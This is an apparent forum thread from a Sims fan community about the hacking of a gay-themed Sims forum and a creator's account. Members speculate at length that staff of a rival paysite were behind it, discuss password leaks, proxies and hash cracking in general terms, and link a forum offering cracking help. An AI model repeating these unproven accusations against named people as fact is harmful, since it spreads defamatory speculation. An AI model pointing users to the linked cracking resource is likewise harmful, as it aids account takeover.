More Awesome Than You!

Well, I just found out that the Gay Sims Club has been hacked and deleted. I do not know if it can be restored. Someone changed the name to Gay Fags Club. I am deviststed. I put years of work into that site. And I am beyond upset. I'd love to know who did it. But I won't hold my breath. I'm just numb.

The fuckers. I am restoring my site now. I'm glad I have a good hosting service, but if I EVER find out who hacked my site, I will hunt him/it down and fuck them up!

My guess would be that it was an unrelated random Internet hacking performed by script kiddies. You need to update your stuff more and avoid using software and plugins you don't understand.

Understandable. If that happened to me, I'd not just be deviststed, I'd be tottimented. Utterly musherable.

However, I doubt even my deep dipsolation would drive me to double posting. Get a hold of yourself.

Did I double post? Sorry. I was posting from my iPod. The GSC has been around for several years, and this is my first hacking. But hey, it's been fixed. And Pes, the only mods I  have on my forum are official add ons from Invision. I update the software as much as I can. Or, as much as Invision updates their software.

Being official doesn't meant it ain't crap. And ultimately, shit happens. If a new breaking exploit just emerged, they may not have officially resolved it yet, so expect a wave of attacks on boards running that software. I wouldn't really call this a deep and particularly meaningful event. This is just typical Internet shit, you get used to this.

I'm used to it. I'm sure it's just some random moron that thought he could put one over on some random site. I got called a Pirate Fag, so that's a bonus. :)

...oh, a PIRATE fag now? See, that's a new wrinkle. Tell me more about this. I revise my previous opinion. I no longer believe this to be entirely random, and now suspect TSR involvement.

Well, they deleted almost everything, all the posts, members and renamed the forum to the Gay Pirate Fag Club. I made a fake name and went in there to see what was going on, and someone that was signed in as me PMed me and called me a Gay Pirate Fag. And that's all he said. One of my members said it's probably TSR.

I concur with this assessment. The MO of the attack implies that it was performed by someone of low technical skills, but possessing privileged information obtained by some means, and a directed motive. A random attack would not have specifically attacked on a member-and-post-level, but instead, would have simply just dropped all the DB tables and left the site completely inoperable, and/or defaced the front page. The fact that the underlying data was not wiped or replaced by a defaced page indicates that the attacker did not have the technical skills needed to perform such an act. So, indubitably a TSR attack.

Cannot argue with logic like that!

So your site is a "Jolly Buccaneer Cigarette Bludgeon"?

Well, Ive never really made it a secret that I despise TSR. I can think of a couple people that hate me enough to do that. But fuck em. Ive worked too hard on the GSC, and even if I couldn't save it, I'd bring it back in some form. I'm not going to let some fuckin idiot run me off.

I wouldn't be surprised if TSR was the culprit, considering the things they've done in the past. The use of the word "pirate" also supports the theory since TSR loves calling people pirates like it's a bad thing. They called the people on the list they stole from that petition pirates too.

Hm. Atwat, perhaps? I'd generally think it beyond her ken, but it's the sort of lowball attack she'd love to do.

I'm beginning to think that T$R is run by a staff of twelves akin to the Oompa Loompas in Willy Wonka. Emerald-haired, tangerine-skinned, pirate-chanting twelves. With mullets. Bad mullets.

I wish I would have gotten some screen shots of this, but my only thought was getting my forum working again.

And Oompa Loompas were the good guys. I was thinking more along the lines of winged monkeys from The Wizard of Oz.

I dunno, man. (http://www.youtube.com/watch?v=gsE0UOz1uw4) Those Wonkans are pretty disturbing.

More info forth coming...

It seems as they were busy hacking GSC they were also hacking into my account on Simvention at or around the same time. This has been confirmed by Nei. They soft deleted all my creations, changed my e-mail  & password. Nei is working on getting my account back up so i can get in and change the e-mail & password.

From Nei on MSN

Are we talking about "hard" hacking here, where an evil genius gets by the host server's security to wreak havoc? Or maybe it was a case of "soft" hacking where some fuck wit lucked out on a less than secure password? Passwords should always be at least 8 characters long and contain a mixture of upper and lower case letters plus one or more numerals. One should also avoid using the same password for multiple applications, and never use the same password to protect strictly personal activity (banking for example) and interwebs tomfoolery like forum usage. Changing passwords often should [edit]not[/edit] be regarded as optional.

This looks like the typical soft case, following the MO of all previous TSR-linked hackings: Compromise to specific user's password followed by application-level vandalism on multiple connected sites. It's not very sophisticated and demonstrates little foresight, planning, or skill.

How are they linked to TSR?

Have Witchboy and/or Scotty used the same password as an account on TSR and that password hasn't changed in a year or so?
Maybe Scotty could try and dig out the IP address from the server log to see if it matches the one used to "hack" Witchboys account?
The user agent string could also be interesting to compare (though i think our "hacker" have learned to hide it by now).

This really should go without saying but just for the record, TSR don't "hack" or in other ways mess up other websites.
We don't feel we need to destroy things, there's plenty of space out there :)

Well, YOU probably don't. But like I've mentioned to you in the past, you've got at least one rogue operator, and you never caught him. Given that the rogue operator responsible for the initial leak was never actually caught, it is reasonable to believe he remains at large and continues to supply the person(s) responsible, even if he isn't specifically that person.

No, Scotty & i both don't use the same password or even the same accounts anywhere let alone TSR. The IP used to hack into both GSC & SV was thru a proxy server.

Screenshot courtesy of Coconut.

(http://i896.photobucket.com/albums/ac163/witchboy1962/Screenshots/ea1ris.jpg)

IF there is a rogue operator somewhere within TSR then i would certainly want him/her caught. If Witchboy or Scotty have any more detail about this i would like to know.
A good start would be to find out if they have used a password that has also been used on TSR.
We changed to hashed passwords about a year ago so even if someone with database access (that is one of the 5 owners me included) would be a rouge operator all he could supply is a password that needs to be brute forced.

If you by initial leak refer to the Buggybooz incident i have also told you before that i think that was someone on your side given the actual evidence we had.
 
Since we repeatedly get the blame for stuff like this i would like to help investigate this.
 

I might have worded that a little wrong, i meant did you have the same password as an account on TSR? (nothing to do with Scotty)

I do have an account with TSR, but I havent logged into that place in several years. I do know that I dont have the same password there. And I have changed my Admin password at the GSC. I am also the only one that has access to my database. (Which has a different password than what I use anywhere else)

I really don't remember what my password was on SV. I hadn't logged into SV in quite awhile. All i know is i can't get in to change it now. As for a TSR password, the one i have now was most probably not the same as my SV password but a variation of.

Seems unlikely, given that everyone on this side of the community is using stock board software that hashes passwords, and nobody else would have the technical ability to change that. The attacker's MO is very consistent, however, and demonstrates a slight iterative refinement with each subsequent attack, which makes it very much appear to be the same attacker, rather than a copycat.

Hang about, what on earth has Coconut got to do with GSC?  I mean, how come *she* was able to produce these details, rather than the person whose site it is (ie you)?  What is that a screenshot of, exactly?

That ip was provided to Witchy from one of the Mods at Sim Vention. He gave that ip to Coconut, and she did a search on it. That screenshot is what she found. I got that same ip when I did a search on my site.

What sort of search on your site?  Why did you pick that particular IP as being the one that had caused the problem?

Well, Witchboy's account was hacked at Sim Vention. That ip was associated with Witchy's account at the time of the hacking. And that same ip came up at my site. Both incidents happened at the same time.

What you are saying is that someone from that IP was using Witchy's account?   And was someone from that IP using your account at the time you were hacked?   Was that IP associated with any other account on either of your sites, ever?

It's lucky you were both taking a backup at the very moment your sites were being hacked, or you would never have known which IP was logged into your account at the time, seeing as they deleted the whole lot.   One thing I am still confused about though is where did they make the name change, seeing as all the data (presumably including the text that holds the name of your site) was deleted?

Johan, if there's anyone at TSR I'd believe not to have destructive motives, it's you. That's not saying much. I think you've chosen to pull the wool over your eyes. You need to have an in-depth talk with your brother. If you really want to find out who in your organization might be orchestrating these attacks, you need to start with the person who provided Thomas with the hacked lists of names and emails from the epetition.

References:
http://tsr.mustbedestroyed.org/?p=858
http://www.petitiononline.com/mod_perl/signed.cgi?EANOTOK1

I have searched for that IP in our login log at TSR and came up empty.
It's interesting that both accounts were hacked by what seems to be the same person, this could make it a little easier to figure out if you could find the lowest common denominator.
It's probably not smart to list all sites where you might have used those passwords in public before you have changed them on those sites (if any) but that could give a lead.
To carefully examine the webserver logs for around the time of the attacks could also give something.

If you're using webmail you might want to consider changing the password and see if you can list the logins to it.

I have talked to my brother. I know him far better than anyone else here (or anywhere else for that matter) and just because i choose to believe him based on what i know doesn't mean i'm pulling wool over my eyes.
Thomas has not received any hacked petition list, that was probably just another stunt by Coconut. I actually think she said Thomas gave it to Atwa, have she changed the story now?

I am not willing to condemn someone merely for "Receiving Dox", which I do not believe qualifies as an atrocity in and of itself, and there is no evidence that this list was ever distributed anywhere, based on its relative worthlessness on a strategic level. On the other hand, while you may be entirely willing to vouch for your own brother, I highly doubt you are willing to vouch for the character of Atwa, who is, even by TSR standards, slimy, underhanded, and untrustworthy.

Conversely, while I'm sure you don't care for Coconut at all, I know that Coconut simply does not have the technical ability, the opportunity, or the access, needed to acquire this particular list ex-nihilo. Someone from TSR enabled this list to be acquired, even if nothing was done about it, and TSR was very quick to deny responsibility for anything involving said list even before the fingers had been pointed. And the fact remains, you DO have a rogue operator and he IS still at large.

You're correct in that i'm not willing to vouch for Atwa, i barely know her. What she does or doesn't do is completely on her own.
I haven't seen anything at all that supports the theory that someone from TSR enabled the list to be acquired.
You sound very certain, do you know something about it that it don't?

Given the purpose of the petition i would imagine someone from TSR would be the last person to get access to it.
I believe it was established that the password was not from TSR in this case to?

You're wrong about when we denied responsibility, that was done after Coconut had accused us of it, a couple of days after if i remember correctly.
You're probably right about Coconut not having the technical assets to get access to the petition by some kind of hack though.
Would it be very unlikely that someone just gave it to her? She could at least put it to some use.

You seem to be quite sure about the rouge TSR operator and while i won't completely disregard that possibility there is reason to look elsewhere to. Especially considering what was found when me and Delphy investigated the Buggybooz incident, there was a very distinct trail leading elsewhere.

Either way i would certainly want to know based on things that can be verified ant not just theories.
It should be possible to find out if an email also used on TSR that has the same/similar password could have been used to recover a password for example.
In that case it might be possible to get a list of previous logins to see from what IP they came (at least if it's webmail).

I had no idea about SV being hacked into until yesterday when i tried to log in over there. I contacted Nei via MSN. She checked SV for me & found the info i posted earlier. I immediately told Scotty. SV is not mine or Scottys site. Destin owns SV, btw which will be gone after this month. Destin is no where to be found & Nei has limited access. The hacking into SV was done via my account as Nei stated in my earlier post. No one on SV or GSC was taking backups of anything during the hackings.

I am a creator and moderator on both SV & GSC. Scotty is Admin on GSC & just a regular member on SV. The ip used to attack GSC is the same ip that went in on SV & changed all my info & soft deleted my creations.

As for the motive of both sites being hit. I am pro pirate/file share friendly. Scotty and GSC pro pirate/file share friendly. SV pro pirate/file share friendly. Plus the TWAT has had it in for me ever since she busted me on Sims File Vault for file sharing.

There was also apparently an anti-gay element to the GSC hack (the name change), so it would be interesting to look back at anything ATWA has posted and see if that fits her persona.  Normally women are more tolerant of male homosexuality than men, especially very young ones.

Yes, but this is Atwa we're talking about.

I must live under a rock, because I've never heard of ATWA before this all happened.

I don't believe anything was really firmly established about the passwords in this case, because the person in question has been dead for a very long time and this event was roughly contemporaneous with the original Buggybooz incident, IIRC.

Unlikely, given that I have explicitly ordered no such actions be taken. It would serve absolutely no purpose, given that the from a strategic standpoint, such an act has no value.

There wasn't so much a "distinct trail leading elsewhere" as a "lack of smoking gun". Delphy is unwilling to do anything without a level of proof suitable for a legal prosecution. As we are not interested in legal prosecution, we simply don't need that. It is enough that I recognize the signs. The information used could not really have come from anywhere else, and you have already admitted that the information was stored in a form that was easily accessible. Such attacks in the community had been completely unheard of until that point, and the fact that attacks of the same pattern continue to appear sporadically following that incident suggests that the list continues to be in use, even if it is not being updated anymore.

Sure, it would be "possible" to find out. All you have to do is hit the "lost password" button on any website, and most standard software will contact the email with a reset link. You know this, I know this, everyone knows this. Of course, unless you want to hack someone's account merely to prove an obvious, known fact, this line of inquiry serves no useful purpose.

May I just note that the fact that Johan came Whiteknighting as soon as whispers of "Hey, this reminds me of that incident in 200whatever, remember that, we still think that was TSR based on what we know, this looks very much like that did" started has completely re-assured me that there is, in fact, no TSR involvement. At all. Because they said so. Definately. Just like last time. And the time before that. And the time before that.

So the link to TSR would be that Bluesoup had an account at TSR with the same password as for the petition and that password was leaked somehow in the same way as for Buggybooz?

First of all i find it hard to believe Bluesoup used the same password as on a TSR for a petition against EA's collaboration with TSR.
Even if she did you would have to know the secret part of the URL in order to log in and manage the petition. This URL is only sent to the petition author.

This means the rouge operator also had access to Bluesoups email or that she willingly shared that URL with someone and that someone passed it on to the operator.
I find it unlikely she used the same password for her email as on TSR. (if she indeed have or have had an account on TSR, i can't find an account named Bluesoup or one that uses the email used in the petition)

From what i can gather by googling this Bluesoup claimed the petition was "hacked" March 18 or earlier, the Buggubooz incident happened March 30.

Does this mean you knew the petition had leaked and you ordered coconut or anyone else not to do anything with it, or what?

I'd say it suits your purpose perfectly from a strategic standpoint. Isn't the general consensus that TSR was behind the petition leak and is now spreading it around/uses it for evil purposes?
That surely has a lot of value in the anti TSR camp.


There was a pretty distinct trail, in case you forgot here's what we found when investigating it (using data from both TSR and MTS):


In the list of IP's Atwa got from the service provider when she found out someone had been reading her email we were able to match them to the unproxied IP's of sherriesim. Unfortunately we didn't get the user agent from that list but i have a very strong suspicion that it would have matched the hackers signature.

We clearly have a very different POV.
From where i stand this is a smoking gun and it's not fitting with your idea of a rouge TSR operator.
The person behind the Buggybooz incident didn't get caught so he/she could possibly have been behind other hackings.

That isn't what i meant. It should be possible to find out exactly how it works in the case of Scotty and Witchboy without any kind of hacking.
IE, would it be possible just by knowing their email address to gain access and "hack" their accounts?
If the answer is no then there is no link whatsoever to TSR.

Are you kidding? This is BLUESOUP. BlueSoup is a fatheaded idiot. I mean, what do you expect from someone who starts e-Petitions? Everyone with half a brain knows those are utterly worthless. Hell, it's already been firmly debunked on Snopes.

I don't know how "secret" such a URL is, but the Fathead would be dumb enough to lose her email that way, yes.

Like I said, roughly contemporaneous. I distantly recall them as events that occurred within the same year only, and wasn't even sure which came first, but you have nicely put a date on them that has them seperated by less than 2 weeks, which rather tightens the association between these two events nicely!

No, it means that I have explicitly ordered people NOT to perform any such false-flag operatons or actual hackings.

Actually, at the time, the petition being hacked was mostly blamed on BlueSoup's incompetence and not specifically linked to TSR. In fact, the origin of the name list wasn't even resolved until later. The petition thing had been really entirely blown off and forgotten about within days, as no real proof was ever found, and besides, those things are stupid as hell. What brought it back to light was the fact that the list was intercepted circulating the halls of TSR. At first, it was speculated that it was a selected list from TSR's database again, something that TSR issued a suspiciously quick denial of, but this idea never really gained traction and pretty much died out instantly after the BlueSoup Petition Theory was proposed.

If by "trail", you mean "the IP of a public proxy service", which coincidentally happened to match someone who was also probably a user of that network...totally meaningless, really. The ONE trend of this is that the attacker ALWAYS uses proxy SERVICES, never simply open proxies scanned from the open Internet. It's always some kind of known service provider of proxies, as opposed to the many unknown random proxies dotting the Internet. Other than that, not much of a trail, except that it tells us the attacker does not have the technical ability or interest to scan for his own proxies, and may even be paying money for access to these proxies.

Looks like it could have been Thomas himself then?

It looks like this:
http://www.petitiononline.com/PMBDMBD/RUngyNUKAePJ.cgi
RUngyNUKAePJ being the secret part.
Feel free to sign my test petition by the way.
I don't know Bluesoup but i very much doubt she would give login details to the petition to someone on our side.

It is interesting that the events happened around the same time yes.

I don't know what constitutes a false flag operation but if it includes deliberately spreading false propaganda you should have a talk with Coconut again because it obviously didn't stick.

The use of a specific proxy service alone don't say much but combined with the rather unique user agent and the time line of events makes the trail pretty distinct.
There were also non-proxy IP's that had the same signature (same user agent and the account had been accessed by the same proxy service).

Yeah i think that was the idea with the login to MTS. There was only this one login to MTS with this signature (user agent and IP), the other logins to his account on MTS were normal (not using a proxy and with a different user agent). 
Thomas used the same password on multiple sites including MTS and TSR and there were signs of his TSR account being compromised.

Willingly? Probably not. But she's incredibly stupid and does some very insecure things. And has a fat head.

A false flag operation is when you covertly attack your own side and frame the other side for the act. Coconut is more into "wild speculation based on the available information" and does not have the technical ability or access to stage a false flag operation against anyone.

What sort of "signs"? Merely logins from strange IPs? That could even be Thomas himself checking whether the proxy is working. While Thomas remains the main suspect for the rogue operator who released the information, it could also be someone else. And not all of your DB administrators are fambly, either, apparently. Either way, no matter what happened, SOMEONE leaked the DB information, and the only person who could have done that is a DB administrator. That, or you are postulating the existence of someone who is simultaneously skilled enough to discover and use an exploit in nonstandard software (ruling out script-kiddy public exploits), steal your password database, and inept enough to attempt manual wiping of forum posts as a user, a combination of "extremely skilled" and "extremely stupid, short-sighted, and inefficient" that is completely devoid of internal consistency regardless of what political motivations you wish to ascribe to them.

And when the information available isn't interesting enough she can get really creative and just make things up. A false flag operation from that end wouldn't surprise me the least if she had the opportunity. Like for example if she got a hold of the petition.
It's interesting that the incriminating evidence she claims to have still hasn't shown up.

There were items in his download basket that he didn't put there. Unfortunately our login log has been purged so i can't investigate it any further now.

That login information leaked from the TSR database via some kind of exploit or compromised account is one possibility but there could be other explanations to this.
I don't _know_ exactly what happened and it annoys me a great deal.

Thomas don't have the knowledge to perform such operations without leaving a trace and my fellow sysadmin is also out of the question, even if he would have the technical skills required.
To think that one of the owners of TSR (who are the only ones with access to the member database) leaked login information is just not realistic. I know how we think and operate.

I have not seen anything "made up" except theories. Certainly there has been no fabrication of actual EVIDENCE. And everyone is entitled to crackpot theories, after all. Sometimes they're even right.

Which incriminating evidence? I haven't seen any "claims".

I fail to see how that is meaningful. Any number of reasons could cause items to be added to a computerized download basket. Technical glitches, misclicks, or he could simply have forgotten. This happens all the time.

Well, TSR's code is nonstandard. It's not an off-the-shelf component, and as such, is largely immune to attack by common script-kiddies. That means you're going to need some degree of actual wizardry to find and use an exploit. Let us postulate that such a event occurred and resulted in this outside party acquiring your DB. Why, then, is this same party using the access they have gained from it in such an inept, hamfisted way that is utterly inconsistent with anything a wizard would do? Wizards do not concern themselves with anything as boring and drudgerous as manually deleting posts off a site thread by thread. That would be stupid. A wizard would just drop the entire database in a single command. Or steal it and leave silently, without anything to indicate that something was amiss. That is how a wizard would operate. Given that this behavior is completely inconsistent with a wizard, and NO wizard would EVER do such a thing, we must consider the only other alternate hypothesis: An administrative user did so.

You may very well be right. Maybe they don't have the knowledge to perform such an operation without leaving a trace...and guess what? They didn't. From your own testimony, big, fat, sloppy traces were left everywhere. Not traces solid enough to prove that one of them specifically did it, for whoever did it DID try to cover their tracks, but clearly, enough to reveal that one of them DID do it.

And yet you are left with a conundrum: You agree that TSR owners are the only ones with access to the member database. Yet, information from that database was leaked. Obviously, one of these must be false: Either TSR owners are not the only ones with access to the database, or you don't know how they REALLY think and operate.

I, on the other hand, know security. I know that in order to accomplish sucha thing WITHOUT authorized access to the database, one would have to be a wizard. This individual would have to have a decent understanding of PHP and SQL injection. He would have to understand this subject matter enough that he could devise his own attacks, for TSR is not stock code and cannot be attacked by script-kiddy methods. Having thus the ABILITY to gain access to the DB, he would then need to know exactly what to look for in the DB, and then, having found that information, he would need a motive and opportunity to USE it. Now, I know wizards. Wizards are very tight with the information they illicitly gain. They do not squander it casually, especially when it is so hard-won, and certainly are not inclined to allow mere hoi polloi to play with it, especially not in such a clumsy and amateurish fashion. So I argue that it is clear a wizard did not do this. Do you dispute this argument?

Pescado this is no longer in question.  Johan and Thomas have both openly stated that TSR admins (I think the actual agent was Steve) shared information from the database with a group of TSR artists, supposedly to boost their morale that was low due to having their work "stolen".   I am not sure what it was *intended* they should do with the information.   In Thomas's case he still thinks it was correct to have done this.  In Johan's case he's not so sure.   We haven't heard from Steve to find out how he feels about it now.

Not quite, the actual agents were Thomas and me. We posted names of pirates we caught by the watermark in a private forum.
The intention was somewhere in the line of a morale boost for our artist showing them we were able to do something about the pirate problem.
In all fairness Steve had nothing to do with it.

The watermarking was quite successful until Pescado ruined it all by cleaning the files before putting them in the booty.
Yes publishing names was short sighted, morally wrong and unthoughtful.
It happened but if i can help it it will not happen again.

Anyway, this is completely unrelated to the events we debate now.
Pescado firmly believes that the only way someone could have "hacked" Buggybooz account on MTS would be that the hacker got the password from the TSR database, this is the leak in question.

Johan, the screenshots of the chat I saw where artists were being given details of some users it was Steve with them, I am sure.  This was a chat not a forum.

You don't have to look further than her latest post on PMBD:

Two made up statements right there:
TSR doesn't store password history at all. Unless Coconut is one of the owners this is information she can't possibly know.
Team Johan was some drivel she posted earlier in that thread about my postings on PMBD and here would be some kind of team effort from TSR. Again presented as a fact, not a theory.

I was under the impression Coconut had evidence of the petition showing up at TSR, possibly with some involvement of Atwa. That's what i heard when asking if we should just take Coconuts word for what happened, IIRC.

Sure, all of that is theoretically possible. It is also possible that someone used his account to download stuff and thus knew the password. That could also explain how other passwords could have been obtained if the perpetrator logged in to our admin area as Thomas.

Having an in-house system is a double edged sword. It's pretty much immune to public exploits on the application level but the security of it is only as good as the knowledge in security possessed by its developers, which would be me and Per.
I'd like to think i have a pretty good understanding of it by i am by no means a wizard and neither is Per. Part of the codebase is more then 10 years old and during the time period of the hackings we were maintianing both the old system while working on stabilizing the new one. Stupid mistakes could very well have lead to weak security in some parts of it all.

Again, we actually don't _know_ that the password came from the TSR database to begin with, you just find it likely based on how you interpret the circumstances.

A trace back to Thomas that i would recognize is what i meant. He certainly wouldn't be able to leave a trace going to sherrisim which is what we see here.
I believe that trace is genuine and not a cover up.

I lean towards either someone had access to the database (via our admin system), a security breach or that the password didn't come from TSR.

No i don't think it was a wizard either, the other scenarios i mentioned earlier would be much more likely.
So there, we agree on something at least.

Since you're moving stuff to Sweden perhaps i can offer some server space in our racks? ;)

Not sure what chat that might have beenthen, i was referring to the forum thread that Coconut got screenshots of.
Steve was not actively harvesting pirates there IIRC though he might have posted in the thread.

Yes, but to even penetrate BAD security requires a level of understanding comparable to the people who wrote it, or better. Working from the assumption that you are not grossly incompetent, it therefore requires that someone be at LEAST as good as you to penetrate security effectively: As TSR's systems are all nonstandard, someone doing this would be entirely guessing about your database and directory structure, meaning we're dealing with blind PHP/SQL injection. Not exactly a topic that people in the community are terribly familiar with. The entry barrier to such an act combined with the limited pool of technical talent makes this scenario highly unlikely. Someone external to the community on the other hand, could possess the skills necessary to do this, but then would be devoid of community knowledge, so could not effectively exploit this information to attack along political lines as we have seen, nor would they have the motive to do such a thing. An attacker like this would just deface your website and move on. We haven't seen this, so this scenario, also, is highly unlikely.

Well, if it did not come from TSR, where did it come from? You already admitted that TSR stored passwords in the clear, readable to anyone with even the bare minimum of database knowledge, providing they could gain access to it. Many of the attacked victims have admitted that they used their TSR password. A few cases are unconfirmed, but we have not had anyone categorically deny it. If the passwords did not come from TSR, where did they come from? The only other site with that kind of broad reach would be MTS2. But MTS2 is running vBulletin, a system that hashes passwords by default. It is possible that it was altered not to do so, but to pursue this line of reasoning would be to directly accuse Delphy of doing this instead. That does not seem like a particularly reasonable scenario given that Delphy has absolutely no motive for such a thing and has intentionally attempted to remain as neutral as possible on the issue. Therefore, I cannot conceive of any other scenario in which passwords which all coincidentally happen to be shared with TSR accounts could come to be compromised without the source being at TSR. Can you? Even if a third-party source were to acquire these passwords by an independent, non-TSR-related means, how would they know the passwords were shared with TSR so that they could selectively attack only those accounts?

We don't really know if there is a trace going to Sherriesim. All we know is that Sherriesim was one of the accounts accessed through that proxy with that particular useragent. Numerous highly plausible scenarios present themselves:
1. Sherriesim's account was among those compromised. As the original owner is apparently deceased, this cannot be verified either way.
2. The useragent, seemingly unique, is actually falsified as a part of the using the proxy service. This is trivial and common. As a known public proxy service, as opposed to private or misconfigured proxies, such a practice would be quite common and independent usage by Sherriesim would not be surprising.
So yes, I believe the information you traced is probably genuine. However, it is also meaningless. The same proxy IP used over an extended duration by seemingly unrelated people is merely evidence that it is a public proxy service, which we knew.

Well, of these three scenarios, two appear highly unlikely for the reasons described above. While anything is certainly POSSIBLE, the latter two are unlikely for technical reasons, whereas the first has no particular technical barrier rendering it unlikely: The only reason it is unlikely is because of a computer technician's reading of people. Computer technicians are not exactly known for their great people-reading skills.

You mentioned two alternate scenarios: That an unauthorized user hacked TSR and stole the information from TSR, or that the information did not come from TSR, but was manipulated to LOOK like it did. Both of them involve wizardry: Either someone managed to break security by their own efforts, using technical knowledge to do so, or someone created an elaborate phishing trap to steal information about TSR users without compromising the database, a work which would require a fair level of technical knowledge, as they would need to conduct a man-in-the-middle attack or hijack your DNS, AND create a convincing mock-up of TSR. After this display of technical wizardry, the attacker would then proceed to hack unrelated forums and manually delete posts thread by thread. This makes about as much sense as a terrorist acquiring a nuclear device, removing the detonation charge, and then using the conventional explosive as a suicide bomb.

But you just said you don't believe a wizard did it, either!

Those are good points, to find vulnerabilities in a non stock system requires a lot more than google skills so yes, not likely.
It would be relatively more likely that our forum got hacked, which is a pretty much standard vBulletin install.
The way we integrate it with TSR is that when you sign up on TSR a forum user is added using the same method the forum itself would use had you signed up using the stock install.

I don't find it likely someone within the community would have the skills required for such an attack either but there are lots of places on the net where script kiddies with egos that needs feeding gladly helps.

Hashed passwords (in this case md5 + salt) are not immune to decoding. Google it if you're in doubt.
Buggys password was even of the sort you could have guessed and got lucky.

In response to those scenarios:
#1 We also know that the Sherriesim account was accessed through a non proxy IP with that particluar useragent.
This is a significant detail. The origin of that IP fits with Sherriesim's location AFAIK.

Thomas or someone acting on his behalf would not be able to fake that.
Without this detail i would have agreed with your conclusion.

#2 The information about this particular user agent was not revealed until after the events took place.
The useragent string matched very few logins on TSR and MTS so it's not at all common within the community.
If any other community site would be interested to gig further into this i can post what useragent and IP (non proxied) to look for.

I don't think i have any special skills reading people but i can usually tell if Thomas is lying to me, it's probably not very unusual within family.

I simply don't believe the password were willingly handed out by Thomas for many reasons but mostly because i know him very well.
There would be absolutely no gain for him and/or TSR to have someone hack buggys's account on MTS.

You might think he's stupid, evil, greedy and whatever else his reputation says he is and therefore you find it plausible or even likely he did it.
I know what he really is like and although i don't always agree with his ways it's really not _that_ bad.

The forum coud be hackable, but again, let's look at the motives and opportunities of people who would do such a thing.
1. Random Net Kiddies: Someone like this simply would not have the patience to try to puzzle out your arcane DB structure and extract passwords. An attacking script kiddy will deface your forum and move onto the next target.
2. Someone from the community: Assuming you postulate an anti-TSR activitist doing this, one who is impulsive and disregards publicly-issued orders, would they honestly pass up an opportunity to simply vandalize your forum directly, or pass up the intelligence coup that being able to read your Secret Squirrel sections would be? Alternatively, if it is the work of an internal TSR faction, they would still be interested in your Secret Squirrelism.

And so we come to the fact that community is just not that technically apt. And script kiddies don't operate this way, they go for quantity: Vandalize, move on.

It is possible to crack a salted md5 password, given a sufficiently weak password and sufficient time. However, this is nontrivial in both computational expense and skill required, because you'd need to rig up a small cluster to be able to break unrelated passwords in reasonable time. And there are simply far better ways of doing so if you can acquire a hashed password off someone else's database (also, md5 is losing popularity as a cryptographic hash and software that uses it is becoming uncommon, as most now prefer SHA or others). Additionally, it does not address the fact that even IF they acquired the password elsewhere, they would not know that users were ALSO using them on TSR, and thus would not be able to selectively attack only TSR users, unless they were testing every compromised user on TSR first, which you would notice. While it is possible that the Buggybooz password was individually guessed, a password guessing attack would A: Leave evidence of previous login failures unless they managed to completely luck out and guess the first time, and B: Not repeatedly occur and correlate with people-who-happened-to-reuse-TSR-passwords. With that in mind, I am quite certain the passwords originate from the TSR database. As for HOW they originated from the TSR database, we've ruled out pretty much all the Johan-supported scenarios, on technical grounds, so unless you've got a new scenario to propose, we're running out of non-ugly ways to see this.

"The UK" is not really a meaningful location to fit things to, as many people come from that area, including, but not limited to, say, Atwa, IIRC.

Unless said person were, say, from the UK. In truth, the Sherriesim detail doesn't really answer the question of where the passwords came from. It only tells us that the attacker who directly carried out the action was possibly not Thomas himself.

Fair enough, but that leaves unaddressed the question of who did it. Either Thomas is not showing any signs of lying because he genuinely believes what he told you is true, perhaps because you asked the wrong questions or he misunderstood the question or the acts, or someone else did it. Both could be entirely plausible.

YOU simply wouldn't believe it. And you're right: There's absolutely no logical gain to be had from such an act. Doesn't mean people, particularly artiste-types, don't frequently and consistently behave stupidly and illogically. As a computer tech, this idea is probably not something you really grok, but people are frequently very stupid, irrational, and short-sighted. This is why they buy insurance, lottery tickets, and crap some spammer shilled.

As a T with some F, I say that a  twin *would* know if their twin was lying.  Whether techie or artistic.   And the liar would be finding it increasingly hard to look nonchalent as the pressure is maintained and the income of several people they are close to reduces as a result.

I have made the point that because Thomas has chosen to put on a bold face to the public and maintain he did nothing wrong in originally doxing members, it has *invited* suspicion of further, more heinous, acts that he probably did not commit.   Had he put his hands up in the first place and said the doxing was a mistake, like Johan has, then although there would still be disdain for TSR as a paysite, we probably would not be thinking of Thomas as the devil incarnate right now.

The reason most sims sites get hacked is a combination of poor security and a person who has a grudge against the site owner.  Everyone can take care of point 1, then 1000 devil Thomases with 1000 minion ATWAs working under their direct instruction can't touch you.   A hacker to your sims site does you a favour.  It teaches you about security before you make the same mistake with your company's website and lose a load of money.   Part of that security is about vetting the people you entrust with privileges and info on the site - and this comes full circle back to TSR trusting unvetted FAs with admin-level information.

A third option could be a combination of a 2 getting help from a 1.


http://www.waraxe.us/forum-57.html
This is an example of where you could get information on how to crack a hashed password, find someone to crack it for you and even get help hacking a forum.

The main reason i don't want to write this scenario off completely is that we have had other events where someone has managed to log in on multiple FA accounts on TSR being able to delete things.
We did not find out how that could have happened either and it also support the theory that passwords somehow leaked from the TSR database.
We changed passwords on those FA account to completely random ones to rule out the possibility that they could have been obtained elsewhere and even after that some accounts were compromised.




It's more specific than "The UK", at least one of the sherriesim IP's come from a Manchester ISP. Since this happened some time ago it might be hard to get more information about this now but if some other site owner is willing to have a look in the logs we could perhaps shed even more light on this.
Indeed it does not answer the question where the password came from but it says something about who did it.


Assuming the following hackings on various sites would also be Thomas that would amount to a level of stupidity i can't even begin to imagine given the debacle the Buggubooz incident resulted in.

Scriptkiddy site. Common, but of no real use. This misses one severe underlying difficulty: To get a HASHED password, you need to have access to the database the hashed password CAME from. You already admitted TSR didn't hash them, so getting access to the TSR database would have bypassed this problem to begin with. Conversely, if someone got a password from ELSEWHERE, they would not be able to know which ones are the same as TSR's, and therefore, would not be able to attack pretending the information came from TSR when it did not. Therefore, there are no plausible scenarios for this OTHER than the TSR-origin scenario. Can you think of a plausible origin in which someone could somehow acquire compromised passwords from a non-TSR source, and then make them look like they came from TSR without access to TSR itself? I can't. Even if the information could be gained from elsewhere, which is not likely, since you would need DB access there, too, there is no way to massage this information to then make it look like it came from TSR.

I'm not sure which incidents you're referring to, but if you're talking about what I think you're talking about, I seem to recall incidents in which an actual FA decided to soup from TSR, and did this on their own. This act was then immediately written off as the work of "hackers" officially.

Alternatively, if we're talking about the same incident, or even a similar case, they COULD have simply bypassed the password change using the lost password recovery system, if they had access to the email, either because they actually *WERE* the user in question, only behaving in a manner that your staff didn't approve of by trying to leave, or because they had already hacked that particular user completely.

